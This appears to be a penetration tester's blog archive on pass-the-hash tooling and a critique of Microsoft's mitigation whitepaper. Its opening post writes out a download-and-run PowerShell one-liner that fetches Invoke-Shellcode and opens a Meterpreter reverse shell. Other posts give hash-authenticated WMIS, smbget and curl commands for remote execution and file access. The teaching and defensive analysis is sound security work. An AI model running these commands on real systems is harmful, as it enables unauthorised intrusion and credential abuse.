The unsung hero of the PTH-Suite is definitely WMIS. It has replaced several other tools that I previously used to pass the hash. It is essentially the Linux equivalent to WMIC and the "process call create" query. The advantage of WMI over other methods of remote command execution is that it doesn't rely on SMB and starting a service on the remote host. In most cases, it flies beneath the radar, and it just might be the easiest way to get a shell on a remote host, all without writing to disk.

I recently wrote a post on Pentest Geek about how easy it is to get a Meterpreter shell from a PowerShell console by using Matt Graeber's PowerSploit function Invoke-Shellcode. WMIS with a password hash (or password) is essentially like being able to run a single cmd.exe command at a time. There are lots of ways to turn that type of access into a shell, but few are as easy as this.

The first step is to properly install WMIS as described here. Unfortunately, those steps need to be followed even today for x64 versions of Kali.



Now that we have WMIS installed, we can start our Meterpreter handler. I prefer to use this script to automate the process:

Next, we need to build the PowerShell code we want to execute to get our shell:

IEX (New-Object Net.WebClient).DownloadString('http://bit.ly/14bZZ0c'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.0.15 -Lport 443 -Force

What this does is use Invoke-Expression (aliased to IEX) to execute whatever is downloaded with the .NET WebClient. The Invoke-Shellcode function is downloaded and run in memory, and we append the options we need to get our shell.

Now we need to convert this script block into something that cmd.exe understands. The best way to do that is to base64 encode the scriptblock which can also be accomplished with another simple python script:

You may notice that the script is ensuring we don't pass the length restriction for cmd.exe and encoding the string to little endian Unicode before base64 encoding. PowerShell can be quirky, but a good explanation can be found here. After running the script we have the command to feed to WMIS:
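The original encoding script is not reproduced here, so the following is only a minimal sketch of the steps described above, not the author's script. It assumes the 8191-character cmd.exe command-line limit and the `-NoProfile` / `-EncodedCommand` options of powershell.exe; the function name `build_encoded_command` and the harmless sample script block are made up for illustration.

```python
import base64

# Assumption: cmd.exe rejects command lines longer than 8191 characters.
CMD_MAX_LENGTH = 8191


def build_encoded_command(script_block: str) -> str:
    """Return a powershell.exe one-liner that cmd.exe can run as-is."""
    # PowerShell's -EncodedCommand expects base64 over little-endian
    # Unicode (UTF-16LE) text, not over ASCII or UTF-8 bytes.
    encoded = base64.b64encode(script_block.encode("utf-16-le")).decode("ascii")
    command = "powershell.exe -NoProfile -EncodedCommand " + encoded
    # Refuse to return something cmd.exe would truncate or reject.
    if len(command) > CMD_MAX_LENGTH:
        raise ValueError("encoded command exceeds the cmd.exe length limit")
    return command


if __name__ == "__main__":
    # Harmless placeholder script block for demonstration only.
    print(build_encoded_command("Write-Output 'hello'"))
```

The length check runs on the final command rather than on the script block, because base64 over UTF-16LE grows the input by roughly a factor of 2.7.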

Now we can run WMIS with the command from the previous script:

Now we wait. It could take up to a few minutes, but eventually we will have our shell:

That is it. We can pass hashes to get a Meterpreter shell without starting a service, uploading a binary or using SMB. My next post will demonstrate how to automate the entire process and will discuss the release of the latest addition to the PTH-Suite: PowerPTH. Stay tuned.

Join us at Blackhat where we will continue our talk from last year with new PtH-related content including some simple mitigations. If you are interested in PowerShell uses in pentesting, check out my blog for a list of great resources and sign up for Carlos Perez's PowerShell class at Derbycon. Speaking of Derbycon, Skip and I will be there too!

-Chris

Providing all the extra info that didn't make it into the BlackHat 2012 USA Presentation "Still Passing the Hash 15 Years Later? Using the Keys to the Kingdom to Access All Your Data" by Alva Lease 'Skip' Duckwall IV and Christopher Campbell.

Friday, July 19, 2013

Tuesday, July 16, 2013

Long Overdue Updates - Blackhat, Derbycon and more!

Upcoming Conferences

In spite of what the BlackHat USA 2013 page says, Chris and I both will be at BlackHat this year presenting a talk that will hopefully help folks understand 1) the problem of PTH and other credential attacks and 2) give folks some solid ideas on how to defend against it. We're also releasing some tools to help you guys out... I'm not going to spoil the fun, but you know that Chris is big into powershell, right? *wink*

Also, and it's not up yet, Chris and I will be heading back to Derbycon this year. We're really looking forward to it!

PTH Tools in Kali

I'm not sure if everybody saw, but one of the Kali devs did some pretty neat stuff to incorporate most of the PTH toolset into Kali. For those of you who don't know Raphael Hertzog, here's his blog: http://raphaelhertzog.com/. He's a regular Debian contributor and I know he spent a fair amount of time working on getting PTH in Kali. He has a donations page. If you find the PTH toolsuite useful, please consider donating to him via Paypal. I just did!

Here's the Kali post in case you missed it: http://www.kali.org/kali-monday/pass-the-hash-toolkit-winexe-updates/

More To Follow...

I plan on trying to make some more time to post on the blog related to PTH and a series of posts on defense as well. We'll see how that turns out :/

Sunday, April 14, 2013

Missing PTH Tools Writeup - WMIC / WMIS / CURL

Looking back over my blog, I realized I never did a writeup on the wmic / wmis / curl tools with the PTH functionality. So, I'm going to do that now while I'm thinking about it ;-)

WMIC / WMIS

Windows Management Instrumentation (WMI) is officially defined by Microsoft as "the infrastructure for management data and operations on Windows-based operating systems". You can Google more, but the TLDR version is that it uses a subset of ANSI SQL to query the operating system for various things that might be of value. You can also interact with the Windows OS by accessing methods that are exposed by the various WMI providers. More on this in a few.

Somewhere along the way, a WMI client appeared on the net. I'm not sure from whence it came, but for a while it was being used by Zenoss to monitor Windows machines. The problem is that it was written based on an old version of Samba 4 with some additional functionality that has since been removed from the Samba 4 source tree. So, in essence, it's unsupported and getting it to work with newer versions of Samba would be painful, as one would need to recreate the functionality that got removed a few years ago.

The first tool I'm going to talk about is "wmic". This tool can be used to issue WMI queries to a Windows computer. Note, this tool is only for queries. For example:

root@bt:/opt/rt/bin# wmic -U demo/administrator%hash //172.16.1.1 "select csname,name,processid,sessionid from win32_process"

This query will list process names and PIDs for running processes on 172.16.1.1 as seen in this picture:

The next tool is a little more interesting. I mentioned earlier that there were ways of accessing 'methods' of various underlying Windows functionality. One of the most interesting ones is the "create" method from the win32_process class. This allows WMI to create a process on the remote system. It only returns whether or not the process was created, not the command's output, so one would need to redirect output to a file and grab it somehow. The WMIS tool takes advantage of this behavior to start processes on the remote computer.

For example, running the command:

wmis -U demo/administrator%hash //172.16.1.1 'cmd.exe /c dir c:\ > c:\windows\temp\blog.txt'

runs the command 'cmd.exe /c dir c:\ > c:\windows\temp\blog.txt'. Note the "cmd.exe /c" is required to actually execute the command.

We can then use something like smbget to dump the output, e.g.:

smbget -w demo -u demo\\administrator -O -p <hash> smb://172.16.1.1/c$/windows/temp/blog.txt

And, we can see from this screenshot that it worked as expected....
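The run-then-fetch pattern above can be sketched as a pair of argument-list builders. This is only an illustration that mirrors the two command lines shown in this post: the function names are made up, `<hash>` stays a placeholder, and nothing is executed.

```python
import shlex


def admin_share_path(windows_path: str) -> str:
    """Map c:\\windows\\temp\\x.txt to the admin-share form c$/windows/temp/x.txt."""
    drive, rest = windows_path.split(":", 1)
    return drive + "$" + rest.replace("\\", "/")


def wmis_argv(domain, user, nt_hash, host, command, out_path):
    """Build the wmis call; output is redirected because WMI returns none."""
    # "cmd.exe /c" is required for the remote command to actually execute.
    remote = "cmd.exe /c {} > {}".format(command, out_path)
    return ["wmis", "-U", "{}/{}%{}".format(domain, user, nt_hash),
            "//" + host, remote]


def smbget_argv(domain, user, nt_hash, host, out_path):
    """Build the smbget call that retrieves the redirected output file."""
    url = "smb://{}/{}".format(host, admin_share_path(out_path))
    return ["smbget", "-w", domain, "-u", "{}\\{}".format(domain, user),
            "-O", "-p", nt_hash, url]


if __name__ == "__main__":
    out = "c:\\windows\\temp\\blog.txt"
    args = ("demo", "administrator", "<hash>", "172.16.1.1")
    print(shlex.join(wmis_argv(*args, "dir c:\\", out)))
    print(shlex.join(smbget_argv(*args, out)))
```

Keeping the builders free of side effects makes it easy to check the quoting before anything is run against a host you are authorized to test.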

What sorts of evil things can you do from the commandline? Aside from piecing together an asynchronous shell, there's a lot of interesting things you can do... I'll let @obscuresec answer that one in a guest post here soon.... It's nice and evil, trust me...

CURL

Curl is a useful command line web utility that also has support for several other protocols, such as ftp, smtp, pop3, and others. I patched PTH functionality in as a quick method to access some of these other protocols if they prompted for NTLM authentication. The easiest example is grabbing info from a sharepoint server....

For example, if we want to log in with bob.franklin and grab his default sharepoint page we can do something like this:

curl --ntlm -u bob.franklin:<hash> http://intranet.demo.local/Pages/Default.aspx

And you see we get a bunch of html back from the server in the image.

Monday, April 8, 2013

PTH Toolkit For Kali - Interim status

TLDR

I've uploaded 2 tarballs to https://code.google.com/p/passing-the-hash/downloads/list

One is 32-bit and the other is 64-bit. Everything works from my original talk on both with the exception of wmis, the WMI command execution tool. Extract the tarball into /opt/pth and set your PATH variable to point to /opt/pth/bin and you should be good to go.

For whatever reason the 64-bit version of wmis didn't work while the 32-bit version works like a champ. If you need that functionality, use the 32-bit binary (also uploaded).

In order to use 32-bit binaries on 64-bit Kali, you need to add the 32-bit libraries. Follow these steps:

- dpkg --add-architecture i386

- apt-get update

- apt-get install ia32-libs

Slightly Longer Version

I'm starting out by distributing 2 binary tarballs, 32-bit and 64-bit. After having spent a fair amount of time working on the packaging of winexe, only to discover that the latest version didn't work on 32-bit operating systems, I decided it was time to take the distribution in stages.

So, I tweaked my build scripts (found here on my google code site), updated stuff wherever needed and compiled.

I had planned on only releasing one tarball.... then I discovered that 64-bit Kali didn't have any 32-bit libraries installed. So it became an issue of whether or not to force everybody to install all the required libraries for 32-bit operation. When I looked at it, it was something like another 300mb of libs for everything to work. So I figured that I'd give it a shot to have 64-bit compiled version as well.

Testing revealed that the 64-bit version of the 'wmis' tool didn't work; it gives some sort of RPC error. Given the "barely working as it is" nature of things, folks on 64-bit Kali who need to run it can install a subset of the 32-bit libraries and use the 32-bit binary, which works just fine. I uploaded the 32-bit WMIS to the google code download page so it can be downloaded separately.

The Tools

Samba 4 / Openchange - Tools/libraries for interacting with Windows / Active Directory / Exchange

FreeTDS / SQSH - library / utility for interacting with MSSQL databases

Winexe - PSExec clone

Firefox - ESR 17 release 5

Curl - Command line web browser (upcoming blog post)

Wmic - Simple WMI query tool (upcoming blog post)

Wmis - WMI tool that uses "create process" from WMI to execute single commands (upcoming blog post)

Installation

I've uploaded 2 tarballs to https://code.google.com/p/passing-the-hash/downloads/list

Download the tarball that's appropriate for your distribution and untar/gzip it to /opt/pth.

Set your path to include '/opt/pth/bin' and you should be good to go. No need to screw with library paths as all that jazz is compiled into the binaries to look for their libraries in /opt/pth/lib.

In order to use 32-bit binaries on 64-bit Kali, you need to add the 32-bit libraries. Follow these steps:

- dpkg --add-architecture i386

- apt-get update

- apt-get install ia32-libs

More To Follow...

Saturday, March 23, 2013

PTH and Kali - Status

I was directed to this bug report on the Kali list relating to the PTH-suite being missing:

So, where are we at?

I'm working on it. The big difference between Backtrack and Kali is that Kali is based on Debian and the maintainers are trying to stick to the 'Debian' way of doing things.

When Putehate and I put together the package for Backtrack, we just shoved everything into a single package and stuck it in the repo. The package didn't have any deps listed, no source was included, etc. The 'Debian' way of doing things has the package manager itself build the packages from source. This means that I actually have to pay attention to the extra bits that control package behavior as opposed to just packaging up a bunch of pre-compiled files.

This is actually a good thing because it makes it easier to update individual packages. Also, it can actually bring less impact to the existing system. Do you know the difference between PTH Samba 4 + Openchange and regular Samba 4 + Openchange? One single shared library file. So if I package that single library up all the existing Samba 4 / Openchange tools can PTH. Remove that package and you have regular functionality.

Next week I'm on an assessment with Brav0Hax, one of the Kali maintainers, and we are going to try to get a bunch of stuff packaged up. I'll also try to get some functional stuff up on the google code page here in the not too distant future. Unfortunately, in the last year there have been a number of updates to some packages that make my build scripts fail. I'll try to get that stuff updated sooner rather than later for folks to get back up and going quickly.

I'm also going to see what happens if you just take the package from Backtrack and dump it into Kali. That could be a messy explosion or it could work fairly well with a couple of minor tweaks. I'm not sure yet.

Thanks for the patience and know that I'm working on it ;-)

Wednesday, March 13, 2013

Windows Auth - The Nightmare Begins (SSO)

I'm going to start with an overview of Windows authentication and why it's such a large, complicated, unwieldy beast. I'm not going to go into too much detail as there are lots of posts and papers on the subject, however I will hopefully give enough detail for most folks to follow along.

Single Sign On - The Real Problem

Everybody knows that there is a trade-off between security and usability. If a system is too complicated then nobody would use it. If it has no security, then nobody wants to store data on it. So there needs to be balance.

"Single Sign On", henceforth "SSO", is an authentication scheme where the user is only prompted to type their username/password once and the back-end makes every attempt to keep the user from having to do it again. The idea is that everything a user needs to authenticate to is tied together (websites, computer, file shares, email, etc). There's a little more to it than that, but you get the gist.

Is this a good thing? As a user, I don't mind typing in my password a couple of times here and there. However, having to log into a computer, then log into a website, then log into email, etc can be a tad annoying. Especially if your password is 30 characters and is a mix of lower, upper, numbers and symbols.

However, it can also be a bad thing. If a user doesn't lock their computer before wandering off to the coffee pot or whatever, then somebody can sit down at the computer and do everything in the context of that user.

Ultimately most places use screen savers that automatically lock after a certain amount of time, forcing the user to re-authenticate with their username / password if their computer is left idle too long.

Ok, so many of the issues with SSO can be mitigated by finding a balance. What's the big issue?

The problem comes in the back-end implementation.

Parlez-Vous Digest Auth?

Tying together multiple back-end authentication schemes typically has some challenges. For example, let's look at part of a packet capture between a Win 7 workstation and a domain controller when ADUC (Active Directory Users and Computers) is used. ADUC uses LDAP to communicate with the DC and LDAP doesn't directly support authentication mechanisms, instead it relies on the SASL (Simple Authentication and Security Layer) library. From the screenshot below you can see that the DC offers 4 different SASL authentication methods: GSSAPI, GSS-SPNEGO, External, and DIGEST-MD5.

SASL Authentication Mechanisms supported by AD

- GSSAPI - Generic Security Service Application Program Interface. In this context it generally means "use Kerberos"

- GSS-SPNEGO - Generic Security Service Simple and Protected Negotiation. In this context it means "try to use Kerberos first, then switch to NTLM"

- EXTERNAL - This means that the authentication is implied by the context, i.e. IPSec or TLS is in use

- DIGEST-MD5 - This is an authentication mechanism sometimes used for HTTP authentication. Essentially it takes the security information and hashes it along with a nonce provided from the server.

Wow. That's a lot of authentication crap to deal with for a simple LDAP query. When ADUC was fired up I wasn't prompted for a password. The actual authentication mechanism that was used in this case was GSSAPI in the form of Kerberos. ADUC passed my Kerberos ticket to the DC on my behalf without me doing anything.

However, the Windows client is capable of handling the other forms of negotiation as necessary.

Windows SSPs

It turns out Windows has many "Security Support Providers". These allow the SSO functionality to operate transparently to the user. Here's a brief list of the most relevant ones:

NTLMSSP - Provides NTLM capabilities, fairly straightforward

Kerberos - Provides Kerberos, also fairly straightforward

Negotiate - Try Kerberos then NTLM

Digest SSP - provides hash based authentication for HTTP/SASL

There are more SSPs and there's even a way to introduce custom SSPs if necessary.

The interesting thing to think about is, if the goal is to prevent the user from having to type in their password, how do we guarantee that we can support each of these disparate SSPs?

NTLM and Kerberos can use hashes, so there's no need to do anything with the password aside from hashing it, right?

The problem lies with DigestSSP. How can we guarantee that we can supply the required digest if we don't ask the user for the password every time it's needed?

Sadly, the answer is you store it in memory...

*sigh*

Mimikatz and Digest Auth

Benjamin Delpy, aka Gentilkiwi (http://blog.gentilkiwi.com/) discovered that the passwords themselves were being kept around in memory for use with the DigestSSP. Initially he introduced functionality with his tool 'mimikatz' to dump the passwords stored for the digest auth package. It turns out passwords are stored elsewhere as well. Read his blog (it's in French). Bring tissue, cause it'll make you cry.

This actually makes sense from a SSO standpoint if pestering the user for his PW is to be avoided, but the obvious question is WTFO? Gotta love backwards compatibility and a focus on user experience... Oh, btw, Digest Auth is enabled by default.

SSO What?

So, as it turns out, SSO has bit us in the proverbial "fourth point of contact". By focusing on user experience over common sense security somebody (or a series of somebodies) at MS really got us good on this one.

But Wait, There's More!

My next post is going to talk about more issues with Windows authentication. Then I'll prob start on tokens... then... we'll see where we go from there...

Quick update - More to come

It's been a little over a month since I last updated the blog. Had a lot going on. I quit my old job, took a couple weeks off, then transitioned to the Accuvant Labs team. I've also been working on multiple Blackhat/Defcon/Bsideslv CFPs. It's been busy!

I plan on getting the blog post giving an overview of Windows authentication here shortly. Hopefully the next post will be up soon! I was going to start with tokens, but I think an overview of windows authentication is necessary first.

Sorry for the delay!

Tuesday, February 5, 2013

The Other MS Recommendations

Greetings folks... I wanted to apologize for not getting the next update out as quickly as I had wanted to... you know, those day job folks want me to work or something... *shrug* and I don't really have the luxury of outsourcing my job to China on my behalf...

Anyways...

I'm going to ramble on a bit about the rest of the MS Recommendations from their whitepaper found here:

Instead of a long and drawn out explanation for everything, I'm going to group the remaining findings into categories by what they accomplish and go from there. Many of the remaining "recommendations" are just rehashes (pun intended) of the same old stuff...

Security 101

- Remove standard users from the local admins group

- Limit the number and use of privileged domain accounts

- Secure / manage domain controllers

- Update apps / OS

- Remove LM hashes

Most of the stuff in this category I think is covered by any basic security course. The concept of "least privilege" has been around a while. So has the idea of protecting your critical assets. And let's not forget "Patch Tuesday" because that horse hasn't been beaten dead for years... (Don't forget 3rd party apps!)

LM hashes are kinda fun. Little known fact (and it actually gets a sentence in the whitepaper, I'll leave it to the astute reader to find it) : Even if you have the flag set to not save LM passwords, if the password is 14 characters or less, it is still created and stored in the token in memory. Of course, all of this is overshadowed by the fact that the "Digest Auth Package" (possibly among others) essentially stores the user's password in plaintext, rendering the hashed version irrelevant. (Hint: Search for mimikatz, lazy click here: )

Don't Be Stupid

- Avoid logons to less secure computers that are potentially compromised

- Ensure administrative accounts do not have email accounts

- Configure outbound proxies to deny internet access to privileged accounts

So, clicking on the spam link in my domain admin's email account and then surfing to the porn site is a bad idea? Say it isn't so!

Seriously? I'd like to think that common sense would prevail in most circumstances... however the Darwin awards were created for a reason...

More Pain, Less Gain

- Use remote management tools that do not place reusable creds on a remote computer's memory

- Rebooting workstations / servers

- Smart cards / multifactor authentication

- Jump Servers

- Disable NTLM

The first 2 manage the availability of elevated tokens on the network. This assumes that your network is already pwned. If that's the case, then potentially limiting your ability to manage the network or rebooting really doesn't help out that much...

Smart cards / multifactor auth have been heralded as the next best thing in computer security. However, setting up the necessary infrastructure is crazy expensive, not to mention difficult to implement. Oh, and BTW, there's still hashes stored in AD independent from whatever multifactor auth you've set up that can be easily used to access file shares, email, web sites, etc...

This is because multifactor auth generally only protects "interactive logons". This typically means sitting down in front of the computer and logging in. Some edge applications can be configured to require the use of multifactor auth, such as web sites, vpns, etc. File shares, Outlook, SQL databases and several other applications typically cannot be configured to use multifactor auth. Oh, let's not forget about service accounts... they can't use multi-factor either. Of course all service accounts on your network don't have elevated permissions, right?

An interesting (and often not thought about) side effect of "smart card" logons is that when the check box is selected in Active Directory, the NT password hash is randomized. By default, this new "password" doesn't expire. This means that a 3-year old hashdump or backup of AD is as good as a recent one for the purposes of accessing content as that user on the network. In addition, some places will even set an explicit password for all the accounts, so if that one password is cracked, every user has the same 'password' even though they all have individual smart cards.

One other quick thing... You cannot truly lock out an account via password guessing that has a smart card available. If the person logs in with the smart card, the account is automatically unlocked. This means unlimited attempts at guessing a password even if the password policy is set to lock out after a certain number of bad password attempts!

Jump servers are kinda a strange one to bring up. "In theory" they are placed at the edge of 2 different "security zones" (like DMZ / secure network) and can be used for management of one of the segments. All of the devices in the segment are configured to only allow admin access from the jump server, so it marks a single point of entry. However, this really doesn't do much for the overall security. "In theory" the connections are better monitored or more secure, but in reality, I've never seen an environment that ever used them.

That leaves disabling NTLM. That would solve everything, right? Not exactly. First off, for most apps, NTLM is used when Kerberos cannot be used. There are several conditions where Kerberos cannot be used, namely (among others) when one end of the connection isn't in the domain or is accessed by IP address. NAS/SAN devices typically aren't members of the domain, so they can't use Kerb. Same thing with network-aware devices like printers, digital senders, copy machines, etc... There are usually multiple devices on the network at any given point in time that cannot be joined to the domain.

Secondly, up until fairly recently it was actually impossible to disable NTLM. The only way to do it is to use Windows Server 2008R2 running in the highest domain functional level and everybody's clients must be Windows 7. And since I know that Windows NT, 2000, XP, 2003, Vista and 2008 are completely eradicated from the world like smallpox... oh wait....

Monday, January 7, 2013

Microsoft's Three PTH Mitigations

Before I start the long and treacherous discussion of Windows Authentication, I'd like to take another pause to actually go over the "Mitigations" that Microsoft presents in their infamous whitepaper being pimped on twitter about once a day.

I'm going to gloss over any significant technical details that are best reserved for the upcoming auth blog post and make an attempt to explain, in relatively plain language, why these mitigations are lacking. I'm going to start with the top 3 'Mitigations' and cover the other crud in another post.

I'd like to review the definition of 'mitigation' for completeness as well as introduce a couple of new terms for discussion.

Definition :

Mitigation - The action of reducing the severity, seriousness, or painfulness of something

Synonyms : cure, alleviate

First Order Effect - The direct result of an action taken.

N-Order Effect(s) - Other effects that are a result of the action taken to achieve a first order effect. Sometimes called side effects. Oftentimes these effects are not considered before taking the initial action.

So, to provide an example of first order / n-order effects:

The situation: I'm cold.

The action I take: I light a fire.

The first order effect: I get warm.

N-order effects (in no particular order): The carpet caught on fire (2nd order). The house caught on fire(3rd order). I died, etc...

So, to expand my definition of what a "PTH mitigation" would be: An action I can take whose first order effect is to reduce the impact or availability of "PTH attacks". Make sense?

Mitigation the first, p17 (Note instead of bullets I'm using numbers to refer to the specific mitigations to make it easier to refer to specific points):

"Main objective: This mitigation restricts the ability of administrators to inadvertently expose privileged credentials to higher risk computers.

How: Completing the following tasks is required to successfully implement this mitigation:

- Restrict domain administrator accounts and other privileged accounts from authenticating to lower trust servers and workstations.

- Provide admins with accounts to perform administrative duties that are separate from their normal user accounts.

- Assign dedicated workstations for administrative tasks.

- Mark privileged accounts as “sensitive and cannot be delegated” in Active Directory.

- Do not configure services or schedule tasks to use privileged domain accounts on lower trust systems, such as user workstations."

So, going down the row here what effect would there be if an organization implemented this suggestion on an attacker's ability to authenticate to a machine with a hash instead of a password?

- No effect

- No effect

- No effect

- No effect

- No effect

Huh? None of those would have any effect on using a hash to authenticate?!? Correct, none of these recommendations have any effect on "passing the hash" to authenticate. However, they are not worthless recommendations. Their effect is to reduce the availability of hashes to an attacker by reducing the available tokens in memory. This would be an 'N-order' effect. If an attacker couldn't find an administrative token on a compromised computer, then there isn't any way for the attacker to win, right?

This myth will be dispelled at a later point in time.

It also assumes that your network has been pwned and that the attackers are looking for administrative tokens. But I digress...

Ok, let's look at numero dos (p18). I'm quoting more to illustrate a point...

"Accounts with administrative access on a computer can be used to take full control of the computer. And if compromised, an attacker can use the accounts to access other credentials stored on this computer.

Recommendation: If possible, instead of implementing this mitigation users are advised to disable all local administrator accounts.

Main objective: This mitigation restricts the ability of attackers to use local administrator accounts or their equivalents for lateral movement PtH attacks.

How: Completing one or a combination of the following tasks is required to successfully implement this mitigation on all computers in the organization:

- Enforce the restrictions available in Windows Vista and newer that prevent local accounts from being used for remote administration.

- Explicitly deny network and Remote Desktop logon rights for all local administrative accounts.

- Create unique passwords for accounts with local administrative privileges."

First off, in a paper that "is designed to assist your organization with defending against these types of attack" (p1), Microsoft has a "recommendation" not to implement this particular mitigation and instead take a different step. This seems like a pretty big "oh, btw..." So what exactly is the message that somebody stuck on the wrong end of this document is supposed to get? Do it or not do it? I think a better way would have been to list this as an either/or mitigation step. If you can get away with "a" then "b" doesn't matter. However, this wasn't the case and only serves to further confuse folks.

As to the soundness of the advice? From an administrative perspective, having no local administrator account to be able to log in with and fix problems on the computer when the domain goes down seems foolish. Remote offices have problems with connections to the mother ship all the time. Machines can have problems where they get out of sync with the domain due to any number of reasons. Having the ability to log in, remove the computer from the domain via local admin account, and rejoin just makes too much sense. Or patch, or re-install an application, or any number of other mundane tasks that happen in the real world...

I wouldn't suggest it. Just saying...

Ok, how does this list of items do with preventing an attacker from using a hash to authenticate to a computer?

- If the hash being used is in the "administrators" group local to the computer AND the target OS is Vista, 7, 2008, 2012, or 8, then this would be effective. A couple of caveats, however... If the target machines' OS is XP or 2003, then this wouldn't have any effect. I mean nobody has that stuff out there right? *sarcasm* And secondly... the UAC / network related settings are easy to override by setting a registry key / using a GPO.

- None, this only has an effect on the generation of administrative hashes from tokens

- In essence this mitigation says "have a unique local admin password for each computer". Yes this would prevent a compromise of one machine from using the same hash on another, however once somebody found the document detailing what all the passwords were elsewhere on the network it would be on like Donkey Kong...
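The caveats on the first item are easier to see laid out as a decision. Here's a minimal Python sketch of them, assuming a deliberately simplified model: the function name and parameters are hypothetical, `filter_policy_overridden` stands in for the registry key / GPO override mentioned above (for example the `LocalAccountTokenFilterPolicy` value), and finer points of how UAC treats individual accounts are ignored.

```python
# Windows versions listed above as enforcing the remote restrictions on local accounts.
RESTRICTED_OS = {"Vista", "7", "8", "2008", "2012"}


def local_admin_hash_blocked(target_os: str, is_local_account: bool,
                             filter_policy_overridden: bool) -> bool:
    """Return True if remote admin use of this hash would be stopped (simplified model)."""
    if not is_local_account:
        return False  # domain accounts are not touched by this mitigation
    if target_os not in RESTRICTED_OS:
        return False  # XP / 2003: the restriction doesn't exist
    # The restriction only holds if nobody flipped the override.
    return not filter_policy_overridden


print(local_admin_hash_blocked("7", True, False))
print(local_admin_hash_blocked("XP", True, False))
print(local_admin_hash_blocked("7", True, True))
print(local_admin_hash_blocked("2008", False, False))
```

Only the first case comes back as blocked, which is the whole point: three of the four combinations leave the hash perfectly usable.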

So, under specific circumstances 2 of these mitigations would be successful at preventing somebody from authenticating with a hash. Please just ignore any domain accounts... no seriously...

Overall I rate this a "meh"

Third time's a charm, right? I mean they have to have something good in store since the first couple were pretty lousy...

Here's the excerpt (p18):

"Mitigation 3: Restrict inbound traffic using the Windows Firewall

One of the most important prerequisites for an attacker to conduct lateral movement or privilege escalation is to be able to contact other computers on the network.

Main objective: This mitigation restricts attackers from initiating lateral movement from a compromised workstation by blocking inbound connections on all workstations with the local Windows Firewall.

How: This mitigation restricts all inbound connections to all workstations except for those with expected traffic originating from trusted sources, such as helpdesk, workstations, security compliance scanners, and management servers.

Outcome: Enabling this mitigation will prevent an attacker from connecting to other workstations on the network using any type of stolen credentials.

For more information on how to configure your environment with this mitigation, see the section 'Mitigation 3: Restrict inbound traffic using the Windows Firewall' in Appendix A..."

Sweet! That's what I'm talking about... start denying services to folks on the network. "In theory" workstations should only communicate with servers and not with each other, except for help desk folks and sysads' workstations. Ok, so this sounds like the start of something positive... Let's check out what's in Appendix A...

Quoting from Appendix A (p. 66):

"Workstations can use Windows Firewall to restrict inbound traffic to specific services, servers, and trusted workstations used for desktop management. An organization can do this by denying all inbound access unless explicitly specified by a rule. However, because servers are typically designed to accept inbound connections to provide services, this mitigation is not typically feasible on server operating systems.

Nonetheless, using Windows Firewall to restrict inbound traffic is a very simple and robust mitigation that you can use to prevent captured hashes from being used for lateral movement or privilege escalation. This mitigation significantly reduces the attack surface of the organization's network resources to a PtH attack and other credential theft attacks by disabling an attacker’s ability to authenticate from any given host on a network using any type of stolen credentials."

And my enthusiasm has waned... Microsoft recommends that you don't do this on servers, which sorta makes sense. However, where is most of the data going to be that an attacker is going to be interested in? On the servers...

So you can prevent one low-valued target (workstation) from talking to another low-valued target (workstation), if and only if you have a complete grasp of what should and should not be talking on the network. Realistically, how many environments have this level of detail? I'm not saying they don't exist, but I'm fairly certain that most of the places I've been to wouldn't have the confidence in their setup to actively start blocking workstation to workstation communication.

Even if an org decides to implement this Windows firewall mitigation, how does an enterprise manage the Windows firewall? via GPO? What ports should you block? What protocols should you block? (HINT: MS doesn't list ports/protocols in the whitepaper...) What about managing exceptions, quick fixes to somebody not being able to talk to whomever, etc... What a nightmare! I certainly don't envy the admins on that network if this fresh hell was thrust upon them...
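To show what "deny all inbound unless explicitly allowed" boils down to, here's a small Python sketch of the rule evaluation. It is a model of the idea only, not Windows Firewall configuration. The subnets, the management server address, and the choice of ports (3389 for Remote Desktop, 445 for SMB) are my assumptions, since the whitepaper doesn't list any.

```python
import ipaddress

# Hypothetical allow-list: (trusted source network, destination TCP port).
ALLOW_RULES = [
    (ipaddress.ip_network("10.0.5.0/24"), 3389),  # help desk subnet -> Remote Desktop
    (ipaddress.ip_network("10.0.9.10/32"), 445),  # management server -> SMB
]


def inbound_allowed(source_ip: str, dest_port: int) -> bool:
    """Default deny: allow only if some rule matches both the source and the port."""
    addr = ipaddress.ip_address(source_ip)
    return any(addr in net and dest_port == port for net, port in ALLOW_RULES)


print(inbound_allowed("10.0.5.23", 3389))  # help desk workstation
print(inbound_allowed("10.0.7.40", 445))   # some other workstation
```

The evaluation is the easy part. Every exception and "quick fix" is another entry in that list, on every workstation, and somebody has to know what belongs there.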

To summarize:

Mitigation 1 had nothing to do with stopping people from using a hash to authenticate; it only prevented elevated-privilege tokens from hanging around where an attacker could find them.

Mitigation 2 had some limited effect on preventing somebody from authenticating using hashes if the OS was Vista+ (or 2008+) and UAC was enabled and a lazy administrator didn't tweak the registry to re-enable the old behavior. It also suggested that each workstation have a different password, however I posit that this simply shifts the attacker into trying to find the spreadsheet with all the passwords on the file server. However, this would have no effect on domain accounts!

Mitigation 3 had some promise until a closer look made it obvious that restricting workstation-to-workstation traffic really didn't have a lot of value... Not to mention the unholy blight of Windows firewall management wrought upon the poor admins and help desk folks...

I'll look at the rest of the "recommendations" in another post, and hopefully I'll have an idea soon(ish) of when the Windows auth post will be up...

Wednesday, January 2, 2013

Microsoft's Prototypical PTH Attack Scenario

I think before we get too far along I'd like to quickly discuss the major flaw in the scenario that MS uses in their "PTH Mitigation" whitepaper.

I'm going to start by outlining what MS considers to be a typical attack (p6 - 12).

- Attacker gains access to a workstation at the "system" level

- Attacker attempts to gather hashes from SAM/local access tokens

- Attacker uses PTH to gain access to resources, searches for more tokens

- Attacker eventually takes the Domain Controller (DC)

- Game Over.

To quote the treatise (p. 8) "1. An attacker obtains local administrative access to a computer on the network by enticing a victim into executing malicious code, by exploiting a known or unpatched vulnerability, or through other means."

This seems to be a popular idea of how an attack goes. There's one gaping hole in this idea.

They are actually missing a step.

In reality, often the first 2 steps are different.

- Attacker gains "user" level access to a system (say phishing to be realistic)

- Attacker privilege escalates to "system" on the workstation

- Attacker attempts to gather hashes from SAM/local access tokens

- Attacker uses PTH to gain access to resources, searches for more tokens

- Attacker eventually takes the Domain Controller (DC)

- Game Over.

How is this significant you might ask? Well....

More often than not, user level access is sufficient.

Inside an organization, who has access to file shares? The intranet sites/apps? The email? The internal databases? The users. While "privileged accounts" such as domain admin or other privileged accounts might have more access, chances are all the users in the "finance dept" group have access to all the files on the "finance" file share. There's a good chance the folks in "sales" all have access to both the files in "sales" and the CRM app. Admins probably don't have direct access to the CRM app...

